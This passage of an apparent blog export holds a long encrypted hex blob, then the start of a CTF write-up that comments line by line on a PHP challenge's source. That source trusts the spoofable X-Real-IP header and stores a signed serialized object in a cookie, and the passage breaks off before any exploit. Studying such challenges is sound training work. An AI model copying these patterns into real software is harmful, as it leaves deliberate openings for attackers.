f35f56729892eb787c7c96ba14b955ebf7d94599d5650ea842b159fe34086cdd26f012ed5e132a13e10376e798a1beb622c9143fae5b4cd803138b2c12d6bd13a783f3a2cd43959f2b3fa4b1a3022e81d34877358343864bf0c329314a62555374b8cc46367db79a924a5f95532eec83e366e2e2247e100a77ce1dbfc755e5577269261f5091f824c01a982007a544cb0d13e04ac449a905022c0b145c7eee294bd79f66c7b3e68a40b2f8285d7b7edc32a7aacc241035c1557d802a7d0cc87fbf30fbebdfb5b0039aba49125ceae389dc10d08a566b0d4785e5c3022bcb69cb9c3fb0e412e31205881e921e078016a1cbb864c4e6db9d37473230798a0faada4e4e37d6f61f193b000b4fb367ae2b8f27f2e0f5076a49552366a3942e0a578295d8dea9a130b60f98410fe4a0f0ed677f6748d33d790e3767c62e60d4ad05be13ac2863c9d54628380270076a1a1dd039eb4731213e0c76cf8e3cc92002c1848effeaca52d19a41a3d3e83b887dd3e3d090de70b8901369ea4c22849cd2ed54fcb5a0d9f1ba01328839a581501aa1fa203d8677dad1f785e0ce3ccf3c0ad60c1a75c2820bfb45f44f81c6edbabd3b14ef182265962526ebbff78d142651f73b362524342b9d7c0b4c4fbb7f3ebacfe32b6f56d45d2ea2ccaf18dc3ced6d09017a2e946fbdf3ecf960af85eacd5b487ed9bfc8065689bc044f82db4423789a3979001a25b32f35c3b320f199327c355e471b1e0bc7a13b24483f06ca534408d51e866ce288fc1889ec1a7c1cd08185783b474cc3a83fa5dce7b7938f593072018403c1285a4208d0247336ce9c77f2bc337425cdca8e19ba157fd63f2038a3b27d3103ff1b0e8510caa1dc1073665146f82fa91fad61876ca8410e809938831bd1b42dddbf7f7c01dc89030c2101d5e35a3884ebc90a5bcd78669235b303d043a2c78f762c97b920b3980229ce6a90d7cf5db5daf34e65ddb5c09be100409d0eeedde5e3eb1e08011a4d498dc7d529b5ac21a585102c293baad93f6eb515959af2060a9a02f2bd37bffc4f9138fffea84268718ee2182b52a0acc24f705d4c9e4f6d8d5096eeac0c859f13f9d2345b511e49839ef06c160894ebda293715cacf569ef53043b591273fada19001187be5cfcc5b454958ea59d2ecd93a932446d715d2499029b4d3c87bdd9df0e5b5a027ecd2d29a5c7ce070be04e6bf51867e087db632680ab830b77fd75d18486dc2e027d4f03e37663512a8c80bf87cf46ab38ea283be3f5bf440871f6997e55dd0774300f769a6993ac2c8babb2245db0f6e742961ebdfede9506bcfd7ef581d512e3f0f115e41ff5a47a3d76e586364fee26d9da7b9be6776d5a79b6abfb9f0cb85944a5c7d071281351c648ce06cb90c6bba71545844cf2b26
0a45f6ba057c1e2a581607cb18cf6f0144b91707a6f55a3df8013ff00d136d17d0f2f636145acf062bd7832b73fbc8e589402c2f2bf24b9a63a31be93446de907737e92506e417235d2f315c5a9a574eb73f97469493a6459ebea82c35395936da1a8aba7c3c3a34786a6f053f82791953c3c88b1d616b8c409b9d7851435197791168c139dd9c0599748ca4e9b4312854e053fc5fef0012738aa4960726c18991e44459ab15b4d954c136ef0c78e20d219e52c94fcc47eebc8151b321da9ff8e36ea4d7ad206bc7ed122b96fe7da1e933205bffbeac248be7302c01a3a09ae7a5fa654682bc5d2674f496d985b8a4a3c6131b54ba4c701248719e181c1d79824e11dd6eeb25a733a458dd74c204cdb70180e3835264e462d64a4cc5482844db712f9bf3f504a04d4a616688b4a0ff7236211ea7117dec3110b456dca05dd6d10459fb78f7f211ca1e7fe3d2117a2c54a237478a2217094ae31b637729161726a3715dcef3470e9cfb4bc78426c957c78add99715dbd6346ce34b130f2022f6718e5350fd7f126befe691afb71afec1b20a09bb4f70fb3a042f572c42bf71821895a9275e0f9aa2bc1aef4e6ba9a98e6c545790eb4436e779be66fb0bbf229aebd6aafc7761c2f3a8740e9dea93564206e2f32008846e03f24a5d60161b4855056a2f6124f506a4b1a160a9a88ab1ab5c3cb36958894c6808d04d8718cec1641803d7f2c90a0ef8bf0feb76454ea88af88b3cbcbfc3c39c73cabc09d17540f20f0cde7b19e20ccd85b949b951668bd058b9ff523fd17178d0742ebb8ce111a6d2ff0fc0fb32c5107c3144c03a7088cb08de936af726f040922d8c684321954d99e3e4bbf8e0354fcf416d106a5cad0564dfe60a684aabdec209fe9adb69ccefe1e38eef9d9692ee7d5c456fae0eddfe2734cdcc8883890c635d35b484fd0f2201b66594d9fa39fcece2528cc491a56a075099b8c9ac1f085d8fc352cdd2002c96e0d6151876e389971bcaef2191ec49445ba93891d4badf22104ef2014929f3f5642c592e15b4824edc564b2b8ea8142d817baa8b8e080e22049206773d92c29496ff6f112a5b872ae15eea88761e6f5174ebb2f5c5c0c43478a33302f9eee81259c71be4d9fb7d3c25311598d1a86901aaa6337fa3a94f138bef93b867a04e55f88f570ecdb0f142abd2f924d93c548bf68d79899b238cd8adbb3e594ac7be2b798a29182bf61ea4f0cb42f82a8cdb1cb37ef250359410382204e924aa68b98e3d728a198318c4cdd330e9796d42d99c6b045d092916be4c4676ff736c56ef00a076a96b8e16bcd8f0ecb0de4a0f0236bb831fa04ec17e5fb69fcdcda62f028e7184865b602d71af3ca0eacf4b38b64bf9c4268ae45df7dd638dc2984d584c387e25d85ae41e29c
0312569b573a47fa3a2c6f223e38f805721d4b91cba76b4f9e06b329a8ab4966aff4a50dc3d4b500986f4b71dc5f7e43ad9407e77678e712530c95e81166219d685a4c90022853553e07be006e82677e05f2dc67c4068f57af544ab4256803da5670c728e8fd071557313a2778300dd844e67acfa572e1584a975ab87e28933edabc775dc5f710e2722b590ce0c67c6c0d52c338cdd122d0b77902bca646fe509757faee4a0c7c4f13cd1d7015c3e492d8640e229537fcf1f14501fec1b5685c561a946843498d74894efc59d0da32bf1113d516ef8ca8bc93b9794e39f2107b67c3cfa2be1fded86d43a08cb14263b4bb4463cdb61a07369b001e0370d59a8edfad0b62e7d3f88c5e2a8d6205ce78f2e7d06329c17db5683c8f117dcff448fe3c134a8a28f6f3aabd17bbf31f2ab1185e750840c21cd826e10caaf3b46d67b05763a7626e40d561ac1aa0d611cb21fc055ea4388f6defaef18fb6861f92bb41114f45b5c84b9b925066bab5faa47a38c61ee77492c3a6ce6957528a853815b77b1661dd7b4249d094baaf0d20e06ec5b498e356509e0812c5112b36d004dd687939a37b3dd29d92ed2a21c936d27a49bc066323f06b70e14c1f65f077794049921bde79e7f090c13bad297ae702002f91a2889355eae5f993786f1727ca446c2813429ef23f49b1a00a71b55220092618890a086c6375b17613d3ce8b30a04decba45fd9b69dbb4f9db661c20604000b6857d58fb33a74b0509ead528754f85402a5c755dc514a34d970733d338c49f653a50a961f5841e8bc56faba0923d9814206d4255bd97ffa10176e4efedf47085008c518d409b76a711aa0d65b4196a8af86bb3d1ea99a4bf63d4ec55e1ee3754e49445c8bf1541f724785aa6c03caafa9264996fa6bfd6d472477b55cbb6348ad8c06021cf975e472f997b2ecfac0f7b4265c503055fc635791bc6af8d191952cdb22e2ab6db2720f8cd49bf65f369efccc9af1fd37cf0fd3b06ec8dd1ec6c1ccdb48c44e62788ba1d25ec7029590716277d402bf6906e5cebc0cfc781d899ed969793217360346629bf7e1cf729a271cd879064f65c79be4f3641e7cca4f0241a48ec018a7793a99fb98bc0bbb47824e9711e8b61e496510c8371ea4e95755b352a18f1e06f7bb7b1450d1f66bd25cb7b3163d5b721acbcfc90c61992adc78746f2b9f01a458904fb610d50be888b4a03350d6370ac9656d79b83f6e7b63b277ef464b320614cc5e4df1245cbd4dbdbb874bcc42d953b225ba9c20af055140cffef3d759782b7bc40c19ceeae36bafbc763fd40fcfbd2173c03f6a467f6052856fe818c2d2a8d285a43939c15eacd0cedcdfd3a38276faeb9c81e7ac3cb99ab12755dae718b2520c05ff9731c608e08ef456dd6f21941
cfa932c3cde04068d9cc0c528ff94caac61b70bb2af00a28433059130bc0c6476411b28cbafef11a96d4d23b7381372ea373fc0a8e975ddf963c7471a953f48885b831b34ef24461acfc2f5e66bb11379f65f13a41700dda7bb90fcfc9933acdb1c02b3ab6735eb5a703d2f1cd62f510de5f85d99c246d0859ea510798e11588261d1a67f20280f32c4122f3dd9a999c716a2cd0d42d618a0f7dc91a88c4b1aca5ac9d9eff92269dc85e229bda31e100b05884ddfa3eaa5ade8808dc99c1bb843356c62cec3da088a224dbe1bf40861d63bfba150d3eb3dff9992b99e21713e42ddf16f3ba045f495be442e4b497702ea3b110b2186023b17527bdb5237a85410d0b381e8fbdb6eb3fb55f88e5afa8e7fd46d16170f8e484e91c000e735aa34cded690d7f4197d6d203c7a3a7c9838e49815850f94defd7db8aed612a7bc1b71822c6b814f13abb400751ce0595de731f9cf9dbfa2dc3317ed489b5eb467a93559312a8b74d31ec6b8c6bdb363277608d3ff25a8fbf8112df29017f3b12ef8df20beb7bdaf554e75c6e043127a9bef6429bb0ea8ee593c1cb10350e9d74b8d7e3de88b9c9524ffa2dfa1283444463eba4b4486254231c28e610f45d530394d9818ff6014bdfd7198189c2435be2e26eda30066ccfee137806926039b4b252126bf46c64059b3f15e53aa8a8a4f127e7e1b27981e39f34596e072db608a24160e266a95ba1a1c9743e4918915db7dbe30c551db9f7fbc9573d2924186ab561b06f422527e23f1251f82928b986c0781e00fe8aac740ea073064ed5feca57ee40ffdf83ecb139f5f985b917e0e55054af7f7a5cc021381a4d1224df62cd79664cc7a23f9dc7d3c0793bdf94009f1c2ed36a91b33ea23711b7e78e2a5fffdc32e1788253c2f07bd78aabcbae88aa22f0d65c3852f6e6abaddbc67b5fa94260a9966d62c713a3b87d5ba4d98f290c3741a14f9ce038535d2dfaaecd56f688feab97b7a6aa68fe026319fb395788fd83027b2a08bee654636f130883929ac9e86c561e11e3dc7809e2a7042280f54acd0e029e9796bb5eeaaa00ae8dfae12f32552d6ec5d21a3ac6eb84784142f2d9ebe8512c63387f0f71001098fa5838ec36146b5f920fc1500c835cb870aeccfcbf3f19152a3f117eb80f8319e91518d54879990f8153ca64a778ffa9a2a79238fd1ff7356c66c28a388c8487919131076de019cb4e40554d0b808b92807950c199281314d238e13d664e09610e19a91461a0ed061539146806ad5b5bb2122ce6555393f859faf06d34f12ae30f3c66c2ca15fd8f4e517f4bb3d8418f7f5afd7e946b53594e689c95120f04cf41c2bbc902c010e52810c74481af4685b84acff84c6d34c1a24b69e1c2fa9407f3e8763e2e5bd123f573c77b59fb608
30030ec86bbc064d73a9be32a63af0a8c5e8d53ce2c7c06b76eb77017bd64932ca3f09027099c7409580cd36d95b985ce4109395e41a9cb0b7a6cab3f0bc3a2494239e95f14550ae6bd2598e208686d0e7728aff750e7590501c752a73e6aafc3563a61b6130fdc2b213dbcbf6ad46e755a32d5d80bf9f929823d2f25e524b453b8ffc1c20f7da0ba1b14ae8dab3058f11aa806377b379304c41d82161ef8909e6e89fb69d7631cdb23deabdc9e599d2dcb246f905f37ca98ec60c27a19780ab13322f01717a20c8ee0b622a29b3a14a9702031eeded0770fc27ee777bad9ef042039d9a05cb06b9b692062f8181a141f64ead458fe743d5ce56195adefbd34894db586d50de3ebb9e9c3f585694cee0807a67da2ac89c50447cb327104d2d2ed2f589c5107a09f84a0da92eb25bb3105d40c50681655d1569ed9277e71679343f05dcadb902718208c84c6df7d58cca79068b915506e21eab9bd39d7ce4af76a90fe924fcd989f70321aba78669430e26fa3cbb1b809be0003b3a1037194a5aba5ea9f443284ea756dabd9ddff44234b64c263c8782c7fcf94e2587a0350a38986cc7dec486a62cee8ce73e940de7fbec7261fd559d3542ba7ef9588d530e83869724535fb4a3f1550b77469ebdd55d4da44f74d0d033fd490786a8b0bed665d1137f2db420d2afe879968c7a4f810b18eff6e063cf3dc82f069457cb3a48b564841f125a1e3cc72a3f01e436ed3713f8218969814749e44fe5c2bc04a2f3c82735b56331cb9cfed773c59debae0e0208b5cdc12ce909930c5c71b2936ebc247b370eff1fce961c99096288d2fa878792a75bbaaf623094ab84826128a99c728729acf87a7080de960551f5322ac5197a5fa38474154c935b978da07dd38d92394c6121e4d6dd5056eb840282fe832e50aa10c149d339696cf08b9b0988567f635505ab870255147b009106c15d49b33b965e8a9cefcc2ca9da504c9889e6843b057e30f6c69b4ad78f16467ae9721e88fd6e547b6d8af8c0bd444cd59a90bcb5d7a60a0ac195c7b9d30801c18bda270821616421abda0c6c276a4ff92f9cd7df3b2fe24b786e0b96f357f6b3e9b4418be22a8add09fecc15c5dd9479da202a25e53804cde1413ee1deb59e46458c6db035ee02a547cd040118cd8ff51c406a49ac02fb79b0f97df6524eadd7b8f1850be77e1e017daaf75d853eab7d8cc078406a18c984a71e6a759b44d8b04779059e36e8d3810cb368740164439ceaecb70222a6fdb727723ae326a27fbaf45c41d0969eed9490143b9e7ce4e1baf54d025dbc2b962d2bf5b8578766c13efaec635cde771ba1160fdf20597cb564ca522a8e926045ba1c89dbaa240b32d1f07a00f385269682f0dc064486190d69979905704d0b66ff37545b
6758a1b85072cbd9cddb9bac01ae67b873a2578a65a098518b06f28ede102221b60f1936d3f6ed8c238bf67e30815c26aad7af96369dc6a77ce6c35d85c0a87bb7bd1a25e2ed0ebec861688a03a14c8d30bb6b61dfc95440548f0ad69e5d409f8a3f665bacf30cb041542d067baa113a9623f628533d6dd5219e06ba5503951fcfbba8bf68649191c44f1715cac129fb5e2abcff5aa5ce1a84892933a03310ba5b788871e4da2294663158686341b384061c3dc8e2a315c5289efd7a7b24dbebe1f53c753d11377b35c29176c198769602ca6581c72b89fe6d40456ae59948b7eff6f961e36b63116eecf2e7336adf72160a4246ab2577391a376be2a3b55679485f796a4f48ed1de63ce16c622cd48725bf93b01d2e0bd5d560a09e5ec6481178dc25d6f9f03d0ea0147a744978022bdea46b0f6c717653c2e769224111f9a5b6b315d1d933b79b5c6b32fdf3bbadd93a434402664a7e32831c5e0c2e21a7861c85e9fa55b28f52e1d6cd6954356cb0c15d8837e214f4b0593b9cdd619493f7927ee80b8b5272076fe04b86f209424166864fe67793d8ceb9cfe87d0c2a369f18af2e7f03eba6e11f3330cd7a44a6efb4f9796725b97d0ac702bf02144767d22572f27abdc587c22f23d1524db8aaec57148e2541fb261838e132be4e759afa30c0d83fa50954c0a16348ab15bedc567a247fe37570f8f61978140cc2067d273028599889e1edcb20af8051633519e6a4f73b8e4df214fcd59d1e19ec30a34fa49359be76c26fbcfd2a1592c545cbaea461a6bfff3cade02ed365fc4f452e98202d4b0af8816c132df6a33223cec731443de33048fbc4f77dea2221c4adfcd72394f8816657d425c1dffe4db282411bf886ed84a23633ef240745cee76c0e4bee016af9c0c48c64a42512e521015d7e5d771d2aeae0fb4f74d8b897729f03376ca7e79166422a22a4716b8960e564f8911e3cfed4d0ccba24da48edab9a0fc0c700b04551bf8dd496b5e72f561b60a2fdabde8582fbfaade1f0053e6dae18f88b640702b81da7ecc07da7c8cbf0b06d610b23960b26552a1537fc34b0df0a9f2f45ac9083583a9fa2006295c74dd427ca359724d2095e1ce44db4637f897dec748068797053ed88983fcc7fe3c634586adc120073f3e969d55c56a951abbbcea0ed6472d6201775c5e4d9da3c807d91924336adf27292718ec93ad90edf93a6f79e1eba5fc7ea91d970f3aaa43a29f60f7f868bc2181bdeb27281b318ceef96773d4879ae772efe9a9d95374192dd9a35e54348434dfcd969e3f291d88b9de7226651c4996c306a1808ba4eb07c2d491d99ca41707a0626e553d5a2c63c2a79f53e4ed051dce3666e06edcf6b831e644514ebdf5ff2e5f05af2c79646f936c4eb7121f43422c205
0bbd2a6d9421637c7e9ea9e61fa3f0268b8f632186faec193b4214d8671620874c772b1dd0bdf5d1acc313359091c16b0114fc5a7430f045ba31f5eda77a05db6f618603e3bfbe6a500bbcddbf9b6a9d2b0c3ea3c7ffe8c86e6c2fbf8c3e8111368b9c5be45607299b5661bd0daecf4f54d0cddfa53939290291e020fda698fb6ac51abd59859453873ebd5eacd2d94e30ddcb7e115d5b9988a487378f2af3402f8857b61c542f7b89d9d83899afe35a13e3920b13fe715b9a583b66a8f26841d2ae71cae12e2813c284cf8c9ae6a1bb6d83e532de73725dc15e46c6e6a9895255c1e57bd4870fb09609d4c565c3812d388c4bf3d25c437056badd650372fab0f3a9871cbc9b02af468efa1dc697ba2ab8731643d9b6ba05f8ed4233c99588375f62a0d36c7845176a45b7e5ccc0f194e7f2ae8e0180620948370fb21ffdf66352eb55cecf12c51f6a3ad6d31987836a163b418b1e179daa4fcfc47866309816db1ab2b251fccf3bbb713da2d6d8af824bbf030a21b2af091e1ced8432e0230a8b99b91928d78048262ead82262e37a5f38df0cfd9e37c76829728af428cc0f8337e3e61e0acd8e99499b071729df9ca1fc63d651ce1c0878b5781e8d6af9410f5d51b42bf091cb693319b302b6f38f129d820a2cb875bf7371fa0cb4e40434ae3b08546f20b23cf1dcb0f6b51389e65f7bb1accfa7f06a2ec0280c7e3d036f8dee166353cfbea1ae19a687c9b633f0783b112562aa9a6b70bf6da42754a77c3e889a4dc8a1887d0b8e0b7cec3ee6a730eed172c0a0e69745a190ef928c4c9c3d5d1fb8455abab265476638f256bd306ad980174693bedf7497130f9d5bcf59cacd0346e7415d732186a81423e46bab9c7ac1f077f6bde986963b57e378d05ee9d29b5e18aabe288a824e2eb129d463e618e0b66bfcf8779bf50d682064aa4ac7d94cb762fc62d740caaab767a31ffaba70ba43f4ebef6470246e98a94bd52b504f1fd035a286204bac4a48e5be7cf283735a472c5bb6b5f0ce0e7e9eeee47b567a458f467ca17b133407d487a2ab2aabd41b69ca48615503c011127276c522eb47557b25c7860a430b60379d318cb0eae9a19668e09c41df5d8aee7879dfa8fc111dcbc2c1cf78a5e2168dc8773e7d2944ef48dd55bf8efd419e1ba6a8b1dfa2385d0c2c9a4f3fac54acb68ef269973af27de95f3b77e3590365ed6c11b70c2717300f48adf0882559abefb52b3c23337e4358da3bd056fddf524ab9eabc72550276bce59db431f619d2c1fd009782e7246c18ec22b1bc81c9be493fe7b021542cebddbecc8b8f61ac03115e81639de91193fd00a0c431c6ba9493c78aad6f44133aeda599ec42130a923a3cb45e814d76f42c363be1b59bc6a045ad5c976e2cf00095b791d10bf
d31cf2af7669894ed274a7a32d80cb3ab793386223e214df2264e69faf766f343eb3a4eeb1e7216be3b5c970a5b3c3dd8604ea103ae0b2d59421389dec075adbc80388797993e0fd8e196de100f742cc63a790ba3c5b55d9d190c2a5c321ce1a048424b1e8470b462190fb56b90480e63f60a954f59f9ca2d80949929083af3ab0ad30fd153b1a7e2a99d73d474b17f59b209377ac6387b48dda5e25185da8a4cfd5fa8cd732f301c4ce228f18cbf40b3f193c015358e5c0d0e59322a2d39e34d862590a64f0b5e891ce05b881c999bfa6a973e623f0061fe6ebd8603926743172058ccf95584f11e2f26c8438aeb78bc04009e86a580e787322eadde03a0671913bc3bd29000d3d55842840448ab43dd6f15b31893a8e43a2abcb5058bda3aaab124c8bac54c02bac8b2d7c3e272257fc74f7cc206dbfcef3270f3b3bf374ff40cad900882c65c2286467244f1d4252da926195cb29dc08d460f251a9da7e259c6103b692fccbb63ede44ee949881c8a7e97acca08d6ec877f4b2c4b83741add0d3f84c80fcc9a27774cf43234f59b1b3cbe9cc3ec4930a3288b70d2a58737a80765d02a29f9b9d28d21db8a15bde8a1a0f4a819ef139cbfbd3b766c2759c4c0c857abd92fae688662c735a5deb003b5c587450521c7008c83fa015376862f8c4a7c8d5377d9ababd9b7ee704f2bb39483f54ae92a40d5a3acd9802bc6942d2b1049282f2dea384491b70769edabde75a91533367b265cdbc9aac8781e40e4f4893ea43c803641c11f31fc4e6ab28725d2d1233c7ac0b9e708477ec9e56119aec4812789f74c66dcdced84b26e8973a6095fff08d26a6b8810d5093b7194a8e7025171ad68cd312db97a6195765a634fdfde724f416a18a44d6b4f32f12f904dd0f605fb7e73fbd80b464e32a8da7e909b23d97fc19c877d36049b28bfea9bc588fcbe3a589299e2323fa609b62fb8b8342b7d330face2240f07b9f6042a2d594e34faf11f2f6b10d2a4d3813c4df689775cecfd012e7e7283cda3ab056eb5109089426971cfebde3b14ad7caf8a3bc3df8cc07461cef5060b4fc7ecab9b82b94482c56b6d92df05d31590c3b95515109705ee80919578ddd17d80387814032cb66ecafbe5acc5799afc0fd4248b5cf5df7dca95055772a41cbca83ec9a04abb3e7b13400e209fad9cf56282be9e214c2bdd2f4d20c697463abcad37893458545fc6ef23a4ffcb5591f237012d887a897a334663e15c057d06216038e3a239cd3e4271d9f100823db44a270e870fab4be003be85309bede57d2ed2756c893c9da8f1457cdacd3f403deba2567ddce444c2c55d74af6efc56c2cd52d56d6b036d9c67720abe73fe992366224de04f070208fd76dbad587aa4aaa96f89de39f65249ee121526aaa57
62264349fc95c4f63d1a98d0152ada4218fac194372d15ee7540b331a080e7eaecd96bb5c20363e08946b2bcda4882f242d59cdbe6a946bfda2a3a3a01974390b6db76150387140715dcc475d777e4c62f916bc55c319beef8145a27997e7413535b6c3fec14dfa2e42c1aa08a6ccfbb34977f8d90524e5e149021e6393a5e2e59a3a10afb8bdc8b032daadaf89ab7899531fccb0036dd77f18c2bb063e373a13d3049cdc196c69eac8ec1633626a59788b2b9b81f2f333fc3eb1a3d18d242e1a58094c07ca3afc2dde83cb35a5d866d3447eebb6c060a2f71866c851a0b7d41c416898b57850ce9b45a2bf7ab5acd32c464297faf740ca6189767c661c61c89fff954a3a25997cea909007b75fdcc15e45f62e20bd36f40691aac71b5e2664589b8ba89162ad2c01582f003218c14cd9a666862f6849dfe9dadb2fc3f8b90e6148fa57413b436f827bbe690b87d069b1731fc9535cd73ec6eeb11ae2a1bb2317dc9a2ca3d2f583a5fe43e0ad33b11a6119741113a83147c2bae7ee713118bde377f2f57164c0c44d2b30a06d2e7c7d2772dae0cca2e5c17b05513d293fe0d816377aaadfa99b82f1f9fa8d08e8f4a1a366d96f78b1d2b73ea12c44df13a189bc02cbc967c166b5c57bcb57cf1428f01d4660ca3aaf38dd6f28ee089666bd75dfbc089556c26d77dfbdfa4e65b2b59a552f50e6e01512e656fbef76badec5f0525bb4222d17504153fe2670e8f8ca0f8a264e16a76acc6cafcfd21551b059e214178277b2c6175e98097408df1d9bb8f5858a546e3bbcb8892bf23a51d12a9fde119bded058b50a0071c96ff499babfeec9a53a7fab3622e24d4c331d23cf6c0e34f77ad8ea57f7c2e613eeba7a01361d90f292dde26c5dca04f65d585339900e609094407f71f6aaa310eea9ab2a143581a965178e49356425d7940f650950635e06a92371407fba81e3b0fe53f1516f6c38ebda1271c10511e3f344f638d64b929120b6c68db9d683e35462c344d6f87b7a21d4c40bd22c4be758b79362098ff7d4447f316adb4d5706e1f7eadf1914e3dd5ca0836956c096eca7c5328b1e7e7a8b6d93271095b275de8c80aadca892dfa265c2aadb9ee86052e8e2fba7b4b32cf079346b86c43dfb6fc24294b929bd800f25d6547f4ac1cdc14a394637d1c50754e3c46b11adce5e40c8aa8f1737c8e25c5b4ab6504e5f7137c727e527e621738bfe2f3cf6783ce4ddd604fe2c9cb65e7d61e57e47cac20bb06cb45a7b0b4ab9bdad8a246bdb88516cfd0dae0fa009d0de22e46c58498eb31b5658201610f0ac178d9f4a58978b294b4086712e04dd0df534b4b16832ca5869b1fa57dc3e70f12349d2e303a0ce618071b3d8b10392f6a81b909468b433b14890c2fedc192a7a5099a4b159c87
04b84fe4f856b29fbfa37a7a86c95a0ef56a3e0c82baf87f2af5e776db85998ca06434c1c582e8d454dbe4a12de63d4719475030b78d239fcdc9607a0814fe85fcac7b9aeafaa740d93763211ae84bbe040359fcb59581f45c583cea87690f6b06671ef5dabc5cd5bab3f16730107af3cc692b8b606dc22035090e4a436bb2303460c54425f1e9c865f2e4233e22b5e25885dea7ba6b0e1906da0b0cbae2173b672def601ace73ec0a58fd83c0482b44cd7851319e0695e268d0ca48269e21a6e07851b250d518328daa51239297a2bc01daeaede541cbf73f6b5a79aa737cccf6446025eec6532aee9753acb3ecde2e8706c424feba90aca25251f2b95fa961402c1867ee046053e2d8d78f9be5382148141b2e34592a01257dbdc7dc2e0ec77c5e8c829f5bcbe8cacf1cfb69fde32644ae63a77fc264097575c855e1dab187a0aa30b62289343a1803953c8bea62dc399da559d11cab262bc31219d9520a20d715aed1888ba7700afc8bd173cc08b7eff50273debc0afcc21314c22fc0e8dbbeddb8ce7266dc6f2baa86c5d98bc7b6ed8a9afa6a981bea87540e7c52d48ed724a528de00e31075dec83332d004ff3188324bc6770fa424447e122943ee2baf33e84c6bda34f82b3481d1b8fe830eebcdef495e520d93455984cb4d34f203f4a7facd5f772e574dde154ad36d1f810ce94c62732eb2965bae08b514861536ef62afdaf106e57bb2a6f91c7474438cfd93a2ea1f654d189bf48a5c591bc40615a0f4777e256d7fa7af1426dc095ea2ce1415adefb3a5531c46e80c97d9d957e223e2f3d34b7103c0ad806d4e5046ac16daa3b2316802f134254381b9dfbde9ba45db47c1be2bfe72448561db8efec13a4ad50bf41184e8c7741a378b832c364ad6281cf80c2eb690d5edfb58a721dfead67267a4d2bd5c23b61482978b93d35609092816ab9398ad4b604d379670c74be70bc03eba07282cc3dde6d45dd0bf09544942ca59b90631751fd7d8abf60cbe95653a5a47bbcd085caa03e336a28c9108f3190e55af1357351d5aeb1a75d3f634ea5cde26c0a7b894c08b4b60fe92558d8ad9033523a1473bc5926ed82b2efba098fbf8bb86af99b8e544547ddde012a0e4d0d8607b13359d7dae4c1b60ec38f3945fb8573a2189111df27c0b7a01dc33d6d9453637ea92edf5a39414bb73127a16a93a861adecfc3d0bb5e099625bf5b9679919017d61e09939718207c7f9bdcb1b3ac3937a6fb0da3e73f554c03b47c3a84ced88455a30adffc980d1ba7dcd3ce5312351ca3906d208ba943b318c851857105860abc356896d9d39d452cc27b1b9700c22b4b4e9091cdb30f8ea38ee393de4fb72f76b15fa12fa1f528d8f7b36c3bd2344ab496c13c331e819c6a8891742e59ee828c53
1139fedd237366de0fe6e1759d56d9d5a4cee2d4144dfe2d1d2987794d899c590c98d29b45ca0adceae9b19a377b95a74c14c9cb4adb659b859b413fddccc1739d8e2b1fbec66c2eec6eca23df07bbb4e2d96db1e63059a80dd5f7c8d291a61bae23bed46b003d92ce2b3e3f9b630c2d8a053a813c1992558c283c0c0e5c1d7fa5f908870822902010df99d</script>
</div>
<script src="/lib/blog-encrypt.js"></script><link href="/css/blog-encrypt.css" rel="stylesheet" type="text/css">]]></content>
<tags>
<tag>JAVA</tag>
</tags>
</entry>
<entry>
<title>Notes from a CTF Training Exercise</title>
<url>/2020/06/12/%E8%AE%B0%E4%B8%80%E6%AC%A1CTF%E6%8B%89%E7%BB%83/</url>
<content><![CDATA[<h4 id="前言"><a href="#前言" class="headerlink" title="前言"></a>Preface</h4><p>This post walks through a PHP white-box code audit challenge from a CTF training exercise. It is a follow-up to the Phar:// article and is mainly intended as a record of the exercise.</p>
<a id="more"></a>
<h4 id="源码"><a href="#源码" class="headerlink" title="源码"></a>Source Code</h4><p><img src="/img/%E8%AE%B0%E4%B8%80%E6%AC%A1CTF%E6%8B%89%E7%BB%83/index.php.png" alt=""></p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="keyword">if</span> (!file_exists(<span class="string">"/var/www/data/secret"</span>)) { <span class="comment">// Check whether the secret file exists; if not, create it, otherwise read it</span></span><br><span class="line"> $SECRET = randomkeys(<span class="number">16</span>); <span class="comment">// Generate 16 random bytes</span></span><br><span class="line"> file_put_contents(<span class="string">"/var/www/data/secret"</span>, $SECRET); <span class="comment">// Write the 16 random bytes to the secret file</span></span><br><span class="line">} <span class="keyword">else</span> {</span><br><span class="line"> $SECRET = file_get_contents(<span class="string">"/var/www/data/secret"</span>); <span class="comment">// Read the whole file into a string</span></span><br><span class="line">}</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_SERVER[<span class="string">"HTTP_X_REAL_IP"</span>])) <span class="comment">// Check whether $_SERVER["HTTP_X_REAL_IP"] is set and not NULL</span></span><br><span class="line"> $SERVER_IP = $_SERVER[<span class="string">"HTTP_X_REAL_IP"</span>]; <span class="comment">// If so, assign it to $SERVER_IP</span></span><br><span class="line"><span class="keyword">else</span> $SERVER_IP = $_SERVER[<span class="string">"REMOTE_ADDR"</span>]; <span class="comment">// Otherwise assign the client's IP address to $SERVER_IP</span></span><br><span class="line">$SANDBOX = <span class="string">"/var/www/data/"</span> . base64_encode(<span class="string">"ctf"</span> . $SERVER_IP); <span class="comment">// Path is /var/www/data/ followed by base64("ctf" . $SERVER_IP); the dot is string concatenation</span></span><br><span class="line">@mkdir($SANDBOX); <span class="comment">// Create the $SANDBOX directory, a separate sandbox directory per client</span></span><br><span class="line">@chdir($SANDBOX); <span class="comment">// Change the working directory to $SANDBOX</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (!<span class="keyword">isset</span>($_COOKIE[<span class="string">"session-data"</span>])) { <span class="comment">// Check whether the cookie is set and not NULL; if not, a new one is issued below</span></span><br><span class="line"> $data = serialize(<span class="keyword">new</span> User($SANDBOX)); <span class="comment">// Serialize a User object</span></span><br><span class="line"> $hmac = hash_hmac(<span class="string">"sha1"</span>, $data, $SECRET); <span class="comment">// Compute an HMAC-SHA1 over $data, using $SECRET as the key</span></span><br><span class="line"> setcookie(<span class="string">"session-data"</span>, sprintf(<span class="string">"%s-----%s"</span>, $data, $hmac)); <span class="comment">// Send the client an HTTP cookie: the serialized object plus its signature, as session-data</span></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">User</span> </span>{</span><br><span class="line"> <span class="keyword">public</span> $avatar;</span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span><span class="params">($path)</span> </span>{ <span class="comment">// Constructor, runs when the class is instantiated</span></span><br><span class="line"> <span class="keyword">$this</span>->avatar = $path; <span class="comment">// Store the path as the avatar path</span></span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span 